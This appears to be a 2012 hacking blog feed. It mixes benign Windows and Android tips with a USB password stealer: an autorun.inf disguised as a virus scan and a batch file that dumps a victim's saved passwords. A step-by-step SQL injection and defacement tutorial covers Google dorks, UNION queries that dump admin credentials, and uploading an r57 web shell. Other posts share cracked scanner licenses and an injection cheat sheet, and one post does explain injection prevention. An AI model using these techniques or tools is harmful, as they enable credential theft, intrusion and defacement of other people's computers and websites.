IndiCyborg

Add Background Wallpaper On Your Pendrive

noreply@blogger.com (Akshay) — Wed, 12 Sep 2012 04:47:00 -0700

We all might have set background images for the Local drives in Windows Xp. But you might not have set background picture for your pen-drive. It’s a very simple hack so give it a try after reading this post,
All you need to do is, just Copy & Paste the below code to notepad,then save it as “desktop.ini”

[.ShellClassInfo]
IconFile=%SystemRoot%system32SHELL32.dll
IconIndex=127
ConfirmFileOp=0
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=”YourPictureName.jpg”
IconArea_Text=”0xFFFFFF”
VeBRA sources – don’t delete the tag above, it’s there for XXXXX purposes -
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=Folder.htt
PersistMonikerPreview=%WebDir%folder.bmp

Some Information On Above Code:

Where “YourPictureName.jpg” is, delete that and replace with your picture name for example “FreeBSD.bmp”

Note:

Please check that Picture format (.jpg , .bmp, .gif) properly else this hack won’t work.

If your Picture is white colour then folder names will not be clear so change the IconArea_Text=”0xFFFFFF” to IconArea_Text=”0x000000”

Save the notepad as “desktop.ini”.

Place both your notepad file (i.e) desktop.ini and your picture in Pendrive.

Set the above files attributes as Hidden.

Refresh(F5) and Enjoy with your new background.

You can also this on your Windows Xp Local drives (C,D,E,F…)

Thanks For Reading

Keep Visting :- Indicyborg

Secret Hack Codes For Android Mobile Phones

noreply@blogger.com (Akshay) — Sat, 8 Sep 2012 11:33:00 -0700

So in this topic you will come to know all the hidden secret codes which can be used in your Google Android phone . From these secret codes you would be able to access all those things in your Phone which are not accessible by default.

1.    *#*#4636#*#*
This Code provides information about your phone and battery. It shows following 4 menus on screen:

    Phone information
    Battery information
    Usage statistics
    Battery history

2. *#*#7780#*#*
This code is used for a factory data reset. It will remove following things:

    Google account settings stored in your phone .
    System and application data and settings .
    Downloaded applications .

It’ll NOT remove:

    Current system software and bundled applications.
    SD card files e.g. photos, music files, etc.

NOTE: Once you apply code, you get a prompt screen asking you to click on “Reset phone” button. So you get a chance to cancel your operation.

3. *2767*3855#
This code is used for factory format. It’ll remove all files and settings including the internal memory storage. It’ll also reinstall the phone firmware.

NOTE : Once you apply this code, there is no way to cancel this operation unless you remove the battery from your phone. So THINK TWICE BEFORE APPLYING THIS CODE .

4. *#*#34971539#*#*
This code shows information about Your Phone’s Camera .It shows 4 following options :

    Update camera firmware in image (Don’t dare try this option)
    Update camera firmware in SD card
    Get camera firmware version
    Get firmware update count

Warning : Never Use the first option as it can harm your phone’s camera and your camera will stop working . Don’t Try It .

5 . *#*#7594#*#*
This is the popular one . This code let you change the “End Call / Power” button action in your phone.By default, if you long press the button, it shows a screen asking you to select any option from Silent mode, Airplane mode and Power off.

6. *#*#273283*255*663282*#*#*
This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo. This is very usefull . Isn’t it ?

7. *#*#197328640#*#*
This code is used to enter into Service mode. You can run various tests and change settings in the service mode.

Some Codes For WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR
*#*#526#*#* OR
*#*#528#*#* – WLAN test (Use “Menu” button to start various tests)

*#*#232338#*#* – Shows WiFi MAC address

*#*#1472365#*#* – GPS test

*#*#1575#*#* – Another GPS test

*#*#232331#*#* – Bluetooth test

*#*#232337#*# – Shows Bluetooth device address

Some Codes to get Firmware version information:

*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate

*#*#1234#*#* – PDA and Phone

*#*#1111#*#* – FTA SW Version

*#*#2222#*#* – FTA HW Version

*#*#44336#*#* – PDA, Phone, CSC, Build Time, Changelist number

Some Codes to launch various Factory Tests:

*#*#0283#*#* – Packet Loopback

*#*#2664#*#* – Touch screen test

*#*#0673#*#* OR
*#*#0289#*#* – Melody test

*#*#3264#*#* – RAM version

*#*#2663#*#* – Touch screen version

*#*#0*#*#* – LCD test

*#*#0588#*#* – Proximity sensor test

*#*#0842#*#* – Device test (Vibration test and BackLight test)

Note :

Try all these codes at your own Risk . We’ll not be responsible for the use or misuse of this information, including loss of data or hardware damage .

Thanks For Reading

Keep Visting :- IndiCyborg

Lists of Hidden Secret Applications/Programs of Windows XP

noreply@blogger.com (Akshay) — Fri, 7 Sep 2012 05:18:00 -0700

Lots of hidden application or programs exist in your Windows XP operating system. These hidden applications are really very useful and can saves much time when you really know these applications utility or application. Microsoft never tell you these applications / programs description. All these hidden programs are really powerful for similar activities like registry editing, group policy editing, communicating with others etc. This page presents lots of hidden secret programs / application and you will be glad knowing these hidden applications activities.
Lists of Hidden Secret Applications / Programs of Windows XP:

In the following paragraphs, you will find 20+ hidden secret applications or programs of Microsoft Windows XP operating system:

Private Character Editor: Hidden Font Editor Private Character Editor is used to create unique letters and logos for your font library according to your own choice. This program is totally for designing icons and Characters.

Instructions for Private Character Editor: Click on Start menuand click select Run In the "Run" window, type EUDCEDIT and hit Enter key of your keyboard..

IExpress: Hidden Install Creator IExpress program is for converting your files to EXECUTABLE files. This technology is designed to simplify creation of a setup program. Using the step-by-step IExpress Wizard, you can create self-extracting files that automatically run the setup program contained inside. The setup program can be an .inf file or an executable program. IExpress technology automatically removes the setup files after installation, saving the user time and frustration.

Instructions for IExpress:
1. Click on Start menu and click select Run 2. In the "Run" window, type iexpress and hit Enter key of your keyboard

Disk Cleanup: Cleaning Harddisk ,This program is used for cleaning harddisk to offer more space to your hard-disk.

Instructions for Disk Cleanup:
1. Click on Start menu and click select Run 2. In the "Run" window, type cleanmgr and hit Enter key of your keyboard.

MS-DOS Editor: Hidden Text Editor Windows XP comes with another text editor besides Notepad - it's called the MS-DOS Editor is another text editor like Notepad and it's commonly referred to simply as Edit. You can use it as like Notepad. Moreover, it offers many more features such as the ability to work with multiple text files and change the background and text colors.

Instructions for MS-DOS Editor:
1)Click on Start menu and click select Run .
2) In the "Run" window, type edit and hit Enter key of your keyboard.

Netmeeting: Hidden Internet Conference Application NetMeeting of Windows XP can deliver a complete Internet conferencing solution for all Windows users with multi-point data conferencing, text chat, whiteboard, and file transfer, as well as point-to-point audio and video.

Instructions for Netmeeting:
1. Click on Start menu and click select Run
2. In the "Run" window, type conf and hit Enter key of your keyboard

Windows Chat: Hidden Windows ChatProgram Windows Chat can be used to communicate with someone on another computer. But both computers must be connected to the same network (for
example, a local area network [LAN] or the Internet) and each computer must be running a similar protocol, such as TCP/IP. So, you can communicate with others easily.

Instructions for Windows Chat:
1. Click on Start menu and click select Run 2. In the "Run" window, type winchat and hit Enter key of your keyboard

Windows Media Player 5.1: Hidden Windows Media Player Do you know that there is is windows media player 5.1 in your windows XP. You can use it to listen music.

Instructions for Windows Windows Media Player 5.1:
1. Click on Start menu and click select Run
2. In the "Run" window, type mplay32 and hit Enter key of your keyboard

Windows Media Player 6.4 : Hidden Windows Media Player This is another secret of Windows XP. Here you can find Windows Media Player 6.4 (classic) to play your media files.

Instructions for Windows Media Player 6.4:
1. Click on Start menu and click select Run 2. In the "Run" window, type mplayer2 and hit Enter key of your keyboard

Note:
Windows Media Player 6.4 (Classic) is installed along with Windows Media Player 7. The only update is that it now supports the latest codecs.

Dr Watson: Troubleshooting tool This program Is for repairing problems in Windows

Instructions for Dr Watson:
1. Click on Start menu and click select Run 2. In the "Run" window, type drwtsn32 and hit Enter key of your keyboard

Clipboard Viewer: Windows ClipboardViewing This program is for viewing contents of Windows clipboard

Instructions for Clipboard Viewer:
1. Click on Start menu and click select Run 2. In the "Run" window, type clipbrd and hit Enter key of your keyboard

DirectX diagnosis: Diagnose DirectX, video and sound This program is for viewing contents of Windows clipboard

Instructions for DirectX diagnosis:
1.Click on Start menu and click select Run 2. In the "Run" window, type dxdiag and hit Enter key of your keyboard

Character Map: Find unusual characters This program is used for finding unusual characters.

Instructions for Character Map:
1. Click on Start menu and click select Run 2. In the "Run" window, type charmap and hit Enter key of your keyboard

Mcft Synchronization Manager: File synchronization on the network This program is very helpful which allows synchronization of files on the network for when working offline. But this program is apparently undocumented.

Instructions for Mcft Synchronization Manager:
1.Click on Start menu and click select Run 2.In the "Run" window, type mobsync and hit Enter key of your keyboard

ODBC Data Source Administrator: If you like to do with databases, you can use this hidden program of Windows XP.

Instructions for ODBC Data Source Administrator:
1. Click on Start menu and click select Run 2. In the "Run" window, type odbcad32 and hit Enter key of your keyboard

Object Packager: With this secret Windows XP program, you can do with packaging objects for insertion in files, appears to have comprehensive help files

Instructions for Object Packager:
1.Click on Start menu and click select Run 2.In the "Run" window, type packager and hit Enter key of your keyboard.

Group Policy Editor: This program is used to manage group policies, and permissions

Instructions for Group Policy Editor:
1. Click on Start menu and click select Run 2. In the "Run" window, type gpedit.msc and hit Enter key of your keyboard

System configuration: This program is used to control starup programs.

Instructions for System configuration:
1.Click on Start menu and click select Run 2.In the "Run" window, type msconfig and hit Enter key of your keyboard.

Driver Verifier Manager: It seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented.

Instructions for Driver Verifier Manager :
1.Click on Start menu and click select Run 2.In the "Run" window, type verifier and hit Enter key of your keyboard.

Microsoft Telnet Client: This program is used to remotely access to any device.

Instructions for Microsoft Telnet Client:
1.Click on Start menu and click select Run 2.In the "Run" window, type telnet and hit Enter key of your keyboard.

System Monitor: System Monitor is very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance

Instructions for System Monitor:
1.Click on Start menu and click select Run 2.In the "Run" window, type perfmon and hit Enter key of your keyboard.

Program Manager: Program Manager is a program that can be used as Legacy Windows 3.x desktop shell.

Instructions for Program Manager:
1.Click on Start menu and click select Run 2.In the "Run" window, type progman and hit Enter key of your keyboard.

Syskey : Secures XP Account database Syskey secures XP account database. Use Syskey with care, it's virtually undocumented but it appears to encrypt all passwords

Instructions for Syskey:
1.Click on Start menu and click select Run 2.In the "Run" window, type syskey and hit Enter key of your keyboard.

System Configuration Editor: System Configuration Editor can be used to modify System.ini & Win.ini just like in Win98!

Instructions for System Configuration Editor:
1.Click on Start menu and click select Run 2.In the "Run" window, type sysedit and hit Enter key of your keyboard.

Remote Access phone book: This program's documentation is virtually non-existant.

Instructions for Remote Access phone book :
1.Click on Start menu and click select Run 2.In the "Run" window, type rasphone and hit Enter key of your keyboard.

Registry Editor: Registry Eidtor is used for hacking the Windows Registry.

Instructions for Registry Editor:
1.Click on Start menu and click select Run 2.In the "Run" window, type regedt32 orregedit and hit Enter key of your keyboard.

Network shared folder wizard: t is used to create shared folders on network.

Instructions for Network shared folder wizard:
1.Click on Start menu and click select Run 2.In the "Run" window, type shrpubw and hit Enter key of your keyboard.

File siganture verification tool: It's a simple file siganture verification tool.

Instructions for File siganture verification tool:
1.Click on Start menu and click select Run 2.In the "Run" window, type sigverif and hit Enter key of your keyboard.

Volume Control: This program is helpful for those people that lose it from the System Notification area.

Instructions for Volume Control: 1.Click on Start menu and click select Run 2.In the "Run" window, type sndvol32 and hit Enter key of your keyboard.

Thanks For Reading

Keep Visting :- IndiCyborg

How To Make Your Own USB Stealer Steal Password Using Pendrive

noreply@blogger.com (Akshay) — Fri, 7 Sep 2012 04:59:00 -0700

We Do use Pendrive/Usb Storage Device for different purpose but i am really interested in hacking friends password using USB Storage device.Sounds different but yes it is possible i found a way to perform it .

As we all know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Also you know know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords form remote Computer.

Before proceeding Download These Required Material

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc

IE Passview: IE passview is a small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password fox:Password fox is a small program used to view Stored passwords in Mozilla Firefox.

Now Downloaded All the required things come to some real stuff

Note:Kindly disable your antivirus before performing these steps

Steps to create Own Usb Stealer

1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files

Thanks For Reading

Keep Visiting :- IndiCyborg

Widgets How To Find Vulnerability On A Website Web Vulnerability

noreply@blogger.com (Akshay) — Fri, 31 Aug 2012 06:23:00 -0700

As We All know website gets hacked due to vulnerabilities exist on that site so today i will be giving a brief article on finding Web Vulnerability

Now a days Hackers are concentrating a lot of their efforts to find holes in a web application,And This Is the major reason Reason Why Thousands Of Website Getting hacked.If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.

Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available through which even a newbie can find a vulnerable site and start Hacking.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Remote File Upload Vulnerability (Exploits)
5.Local File inclusion(LFI)
6.DDOS attack
7.Google Dorks

And Many More See the Left side Category Box...

I Have Putted My Effort And Written All These types of Attack On my Site With Deatil Tutorial few with examples Please Go Through It If You want to Be A Real Hacker.

Now..
Some Of The Tools that are Mostly used By hacker to hack website Or find Vulnerability on A Website.

Tools Used To Find Website Vulnerability By Hacker.

Acunetix:

Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS & all other web vulnerabilities.

Download Acunetix For Our link

Nessus:

Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file securitychecks a client/server architecture with a GTK graphical interface etc.

Download Nessus

Retina
Retina is another Vulnerability assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.

Download Retina

Metasploit Framework :

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.

Download Metasploit(For Windows users)

Thanks For Reading

Keep Visitng :- Indicyborg

How to Install and Configure Best Network Scanning Tool Nessus - Scan Network Vulnerabilities In Backtrack

noreply@blogger.com (Akshay) — Fri, 31 Aug 2012 06:10:00 -0700

Vulnerability scanning has always played a vital part to strengthen the security of the server at which your useful sites are hosted. It can also be used to scan the security of the computer which is connected to the internet. It basically scans the open ports and then checks for the vulnerabilities present in the services running on those ports.It is always useful for a server admin or else of any system to be aware of the weak points of the server security so that he may make it a hack proof system. That's why I decided to post a tutorial on this site to help you all scan for the weakness in accordance with the latest increasing available exploits.I suggest using backtrack as every thing is already cooked up there. In any other Linux you may have to install all the packages first.

Installing Nessus in Linux:-

Download the Nessus from the official site. Run the following commands under the terminal, If it's present in Downloads:-

cd /root/Downloads (replace root with the username using which you have logged in)dpkg -i Nessus-4.4.1-ubuntu1010_i386.deb
Note:- "Nessus-4.4.1-ubuntu1010_i386.deb" is the name of downloaded .deb file. It depends on your version and name of the downloaded nessus version.

Registering and Setting up Nessus:-

Lets start this part.
I am using "Backtrack 5 r1", So, here I shall go to (A little bit of further effort may tell you how to configure that in any other Linux, as its not much different. Except the menus might be different) Applications>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessus>Nessus Register .

Browser will popup and there it will give you choice whether to use nessus at home or at commercial level. For commercial use you have to purchase a license. So, I am assuming you want to use it at home. Thus select "Using Nessus at home" and next click agree at next page.

There provide your email address and then login into your email account and there you have to verify it for nessus and get the activation code needed. Copy that code provided in email which is in the format of xxxx.xxxx.xxxx.xxxx.xxxx

Open up the terminal and there write following command:-
/opt/nessus/bin/nessus-fetch --register xxxx.xxxx.xxxx.xxxx.xxxx
So, press enter, wait for nessus to fetch newest plugins to scan vulnerabilities and after that your nessus is registered and is ready to be used. Close the terminal.

Now again to go the panel and Applications>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessus>nessus user add. There terminal will popup and then write your username there (Any which you may like) and press enter and write down the password.(Password characters may not be shown not even dots. So, don't worry just write the password),If it asks to give admin privileges in terminal type "y" and press enter. If it asks for any rules then just press enter. And in end it will ask for confirmation type "y" and hit enter.

Now, lets start nessus. Applications>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessus>Nessus Start and click it. Terminal will popup showing starting Nessus.

Open up Mozilla (In my case mozilla worked well than chrome. Flash plugin must be pre-installed in browser.). Navigate to :- https://127.0.0.1:8834 and if it asks for exeption just add one. And let the nessus load. After loading just put the username which you have selected in step number 5 earlier and also type the password chosen there. Hit login and you have a working nessus.

Thanks For Reading

Keep Visting :- Indicyborg

Acunetix web vulnerability scanner Version 8 Full Version

noreply@blogger.com (Akshay) — Fri, 31 Aug 2012 06:02:00 -0700

Here is the Worlds best and most popular Vulnerability scanner...full version download

Steps to get full version of Acunetix web scanner v8 for free

At First got to this link and download acunetix scanner

http://www.acunetix.com/download/fullver8

ID: acunetixwvsfullv8
Password: nFu834!29bg_S2q

Then install it do not open it

If opened Closed it :P

Open patch and click on patch

Now open Acunetix you will be asked for some details

Enter below details

License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
Name: Hmily/[LCG]
ComPany: Www.52PoJie.Cn
Email: Hmily@Acunetix.com
Telephone: 110

Thanks For Reading

Keep Visitng :- indicyborg

Few Best Hacking Movie Geek Movies To Watch

noreply@blogger.com (Akshay) — Thu, 30 Aug 2012 11:36:00 -0700

Top Best Hacking Based Movies

Swordfish

Track Down (aka Hackers 2)

Antitrust

Sneakers

Die Hard 4: Live Free or Die Hard ( My Fav)

The Net

Hackers

Tron

The Italian Job (2003)

The Matrix (Trilogy) ( Old But Very Famous )

WarGames

All These Movies are freely available on torrent just search download and watch it.

Keep Visting :- indicyborg

How to Install Windows 8 From USB Pen Drive

noreply@blogger.com (Akshay) — Thu, 30 Aug 2012 11:29:00 -0700

Microsoft’s Windows 8 Beta version is likely to be released in February 2012. Rumours for windows 8 new features are now at peak and everyone is eagerly waiting for it. Now only the developers preview of the windows 8 available on the internet which may have some bugs. But if you are very keen to adopt this OS then you can download it and can install it via DVD or USB Pen Drive. Windows 7 USB/DVD Download Tool enables you to install Windows 8 from USB drive.

Prerequisites:
    Windows 8 ISO file.
    Windows 7 USB/DVD Download Tool
    At least 8 GB free space USB Pen Drive.

System Requirements:
    1 Gigahertz or faster 32-bit or 64-bit processor
    1 Gigabyte of RAM for 32-bit, 2 Gigabytes of RAM for 64-bit minimum
    16 Gigabyte hard drive for 32-bit systems, 20 Gigabyte for 64-bit systems
    Direct X 9 graphics card

How to Install Windows 8 From USB Pen Drive

    First of all Download/Install Windows 8 ISO file and Windows 7 USB/DVD Tool in your computer.

Insert USB Pen Drive and Format it by 32 FAT System.

Once the formatting has finished,Run Windows 7 USB Tool.
Now browse the windows 8 ISO file in it and click on Next button.

Now the program will start copying files to USB Pen Drive and make it Bootable.

After the copying all the files, remove pen drive and Restart your computer.
Now enter into the BIOS settings (usually by pressing F2).
Now go to the Boot tab and give first priority to USB Storage Device.
Now Save Changes and insert bootable USB Pen Drive in your computer.

Click Here to Download Windows 7 DVD/USB Download Tool
That’s it! Now the installation of Windows 8 will start. Do follow the normal steps on screen to install Windows 8 from USB Pen Drive.

Thanks For Reading

Keep Visting :- indicyborg

Penetration Tool : Maxsqli syntex maker tool MySQL injection

noreply@blogger.com (Akshay) — Thu, 30 Aug 2012 11:15:00 -0700

This tool helps hackers/pentesters to create sql syntax. Its also help in waf bypass sql injection method.

This is small program for those who hate typing :D.
it helps you build syntax for MySQL injection.
It supports basic MySQL injection and error based injection.
Just follow help inside the program and you won't have any problems.
If you find bugs then email on : maxonebt4@gmail.com.
Created By Danijel Maxa MaXoNe.Its a virus free program .Tool is compressed with free exe compressor and thats why it's detected as Pak_Generic.

Download : from here

Video Tutorial :

Thanks For Reading Keep Visting :- indicyborg

Protecting Preventing Sql Injection Attack Protecting Websites

noreply@blogger.com (Akshay) — Thu, 30 Aug 2012 11:09:00 -0700

Hello Friends in this tutorial we will discuss "Protection Of Website From sqli Attack" ,We All Know that Sqli Is Simple But Can Be Used As A Deadlier way so don't wrry if u don't know php, this is php friendly :)
Lets Begin

There are usually two types of attacks :

1. URL based
2. Form based

Major reason for both of them is 'badly architectured parametres'
many say That remove/rename or unlink the database configuration file, ofcourse this will work but this is NOT the solution, as it will halt the functionality of the site, your
Dynamic website will turn into just html pages in seconds, this is anologus to condition like, because of fear of robbery you don't buy anything for yourself too: P
what we will be doing is sanitizing and validating php variables, we have make sure That our critical global arrays like get, post, files, session, cookies etc allow data which we
Want them to store and nothing else, because we can't trust the fact that users will enter expected data. What we mean is suppose you have site script like this:

blabla.com/news.php?id=8

Now what dis means is, in our "news.php" script (in global GET array) we have an array location $_GET[id] which contains the value which is being passed via URL,
In our case it is '8', what usually careless admins do is, pass on the get[] as it is to the database query which is to be executed so that proper content for id=8
Can be extracted from database and thrown on the user screen, SQL query can be like :

$news_query = "SELECT * FROM news WHERE NEWS ='".$_GET['id']."'";

Now if we manipulate the URL and write 'something' in place of 'expected' integer then we may break normal query and can execute our own queries!
by breaking a query i mean, as in the above example we wrote

NEWS ='$_GET[id]'

if instead of expected id we write something like ==> 8'; eval_query; #
now what our new url is ==> blabla.com/news.php?id=8'; eval_query; #
our new query becomes ==> $news_query = "SELECT * FROM news WHERE NEWS ='8'; eval_query; #';
# is used to comment out query part after it, so now as u can see our "eval query" will be executed with normal expected query, eval query can be { DROP TABLE news} which will drop the "news"!
we can prevent this if instead of directly using get[] variable in query we first validate them and then use them, by validating I mean, we make sure that URL variables contains
only that data which we want them to store and nothing else (in this case, we want integers for id values), this depend on the programming of the script, we may sometimes want alphabets(lower case or upper case or both),
numbers, some special characters etc . . . php gives us some function to do the same :
in this case we can use "preg_replace" or maybe 'ereg_replace', i advertise preg_replace cause it has lot more functionality and is faster than ereg :) [you can search php.net if you want details about them]
so here we want only numbers in id fiels so we wil add this line before querying it :

$id = $_GET['id'];
$vald_id = preg_replace('#[^0-9]#i', '', $id);

first line is getting id variable from url via get and storing it in local variable $id, next we are cleaning it using preg_replace, so that it only contains numbers from 0-9 (if anything else is there it will replace it with a blank.space) and nothing else, we will use this cleaned variable
$vald_id in our query.
if we want some(defined) special characters along with alphabets we can write (in place of [^0-9]) :

preg_replace('#[^A-Za-z,.?$@!]#i', '', $id);
Now how to patch panels/forms of sites against sql
suppose there is an admin panel say

blabla.com/admin/

hit [ctrl+u] view source, crawl source and search for [action=], cause every html form will be processin and submitting form elements using php scripts, if its written something like
action="" ==> this means php script is calling itself and its processing is done in same script
if instead there ist written :
action="login.php" [it can also call lol.php dosn't matter :P]
this means all form data goes to login.php processed there and then sent to database. Main culprit is login.php because it is not filtering variables correcty!
go to login.php, it wil be having lines looking like

$username = $_POST['user'];
$pass=$_POST['pass'];
$loginquery = "SELECT * FROM tbl_admin WHERE username ='$username' AND password = '$pass'";
$result = mysql_query($loginquery);

so we need to clean POST array elements before using them in a query
we will use preg_replace as before and we will also use
strip_tags as we don't want any html javascript elements in our form data,
basic syntax is ==> strip_tags($variable)
if you want to allow certain tags like
then we can also do that as ==> strip_tags($var, '
')
i intended to make a short tut but i failed :p hope you

Thanks For Reading

Keep Visiting :- indicyborg

SQL Injection And Defacement For Beginners Complete Tutorial

noreply@blogger.com (Akshay) — Sun, 26 Aug 2012 10:54:00 -0700

1. What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

2. What is Defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.

What do you need before you start with SQL Injection.

*You need Admin Finder ( to find admin panel from website )*
*SQL Injection Vulnerable Scanner*

Admin Finder:
Download Admin Finder

Vulnerable Scanner:
Download ADVANCED HAVIJ Scanner

Dorks for Finding Vulnerable sites!:
Common Dorks
inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=

MD5 Hash Crackers Online:

http://www.md5crack.com
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://md5.rednoize.com
http://md5decryption.com
http://www.md5decrypter.com
http://passcracking.com
http://md5.my-addr.com/md5_decrypt-md5_c…r_tool.php
http://www.xmd5.org
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org

Text to ASCII Converter:

http://www.mikezilla.com/exp0012.html?ascii=login&hex=%2578&unicode=%26%23120;
http://getyourwebsitehere.com/jswb/text_to_ascii.html

Shell:

http://www.kinginfet.net/shells/

Some vulnerable websites
Starting Tutorial:

1. First you need to find vulnerable website.

http://sql-vuln-site.com/index.php?id=15

2. Now you need to find columns.

http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )

Error’s looks like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39′ at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39

3. Now Select columns
Columns is 5

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–

4. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–

you got the version like this:
5.0.32-Debian_7etch11-log

5. Finding Tables
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.

6. Finding Columns in the Table ADMINS.

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–

We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–

And you will got the columns in table ADMINS
There need to have columns with names: username and password

7. Getting username and password.

Now we put concat(username,0x3a,password) and admins

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–

( 0x3a is ASCII )
8. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If password is not hash you are lucky and now you need to find admin panel.

9. Finding Admin Panel

Open the tool Admin Finder
Put the website in the bellow and click Scan.
So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php

You open website and there have Username: Password:
Put username and password what you got.
Done you login in Admin Panel lets upload shell and deface.

10. Uploading Shell and Add Deface

In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:

http://sql-vuln-site.com/upload/r57.php

If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in html and put in the website
So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.

Congratulations you deface the website.

Thanks For Reading..

Keep Visiting :- Indicyborg

SQL Injection Tool Havij v1.15 Advanced SQL Injection

noreply@blogger.com (Akshay) — Sat, 25 Aug 2012 05:29:00 -0700

Today i am posting one of the best sql injection tool know as Havij...
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
The power of Havij that makes it different from similar tools is its injection methods.
The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Download It

To download
Cracked Versions : Click Here

Steps to register

1.Run Havij.exe
2. Once it opens you will see register..
3. Click Register
Make sure you are connected to the internet
4. Under Name:
You write: Cracked@By.Exidous
5. Under File:
You select the folder where you are currently running the Havij program from and select Havij Key
6. Done....

Thanks For Reading.

Keep Visitng :- Indicyborg

MySQL Cheat Sheet

noreply@blogger.com (Akshay) — Fri, 24 Aug 2012 05:39:00 -0700

Hello friends today i am going to start a thread which teaches you about some useful syntax, functions, and queries for MySQL which can MySQL injection attack on websites over a period of time part by part. Here are some in part 1 as follow:

Users:
SELECT USER()
SELECT SYSTEM_USER()
SELECT SESSION_USER()
SELECT CURRENT_USER()

Version:
SELECT VERSION()
SELECT @@version
SELECT @@version_comment
SELECT @@version_compile_machine
SELECT @@version_compile_os

Directories:
SELECT @@basedir
SELECT @@tmpdir
SELECT @@datadir

